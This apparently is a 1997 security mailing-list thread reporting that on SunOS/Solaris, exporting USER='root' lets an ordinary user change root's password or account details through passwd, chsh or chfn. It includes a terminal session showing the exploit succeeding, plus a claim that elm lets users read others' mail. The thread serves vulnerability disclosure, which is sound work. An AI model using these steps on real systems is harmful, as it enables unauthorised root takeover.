login as generic user, than run bash,
bash-2.00$ export USER="root"
bash-2.00$ passwd root
Last successful password change for root: Sun May 4 16:49:07 1997
Last unsuccessful password change for root: NEVER
New password:
Re-enter new password:
bash-2.00$
I succesfully modified root's password :-( Even we have C2 security
installed :-(
I suggest - disable bash !!!
Martin Mokrejs
mmokrejs@natur.cuni.cz
On Mon, 19 May 1997, Trevor Linton wrote:
> This worked on SunOS 5.5.1 Generic_103640-05 sun4m sparc.
>
> Please mind you that this only works on versions of programs
> that use getenv("USER"); to obtain the username, i'm also aware
> anyone who uses elm on ANY system, linux, bsd, SunOS included
> can read any users mail :P. getenv("USER") on programs that are
> reliant on the USERNAME isn't safe especially when there +s'ed.
>
> blind - blind@root.hax0r.org support@hax0r.org
> Swingin' Utters. a juvenile product of the working class.
>
> "People who are having trouble communicating should just shuttup"
>
>
> On Mon, 19 May 1997, Jeff Uphoff wrote:
>
> > "TL" == Trevor Linton <blind@SEDATED.NET> writes:
> >
> > TL> On sunos, if you execute a clean bash shell then type, export USER="root"
> > TL> then USER=$LOGNAME, then execute chsh root or chfn root you can change
> > TL> the root information.
> >
> > TL> On the SunOS system i have [...]
> >
> > What version(s) of SunOS?
> >
> > I just tried this on an old 4.1.2 system I have and I could not
> > duplicate it.
> >
> > --Up.
> >
> > --
> > Jeff Uphoff - Scientific Programming Analyst | juphoff@nrao.edu
> > National Radio Astronomy Observatory | juphoff@bofh.org.uk
> > Charlottesville, VA, USA | jeff.uphoff@linux.org
> > PGP key available at: http://www.cv.nrao.edu/~juphoff/
> >
>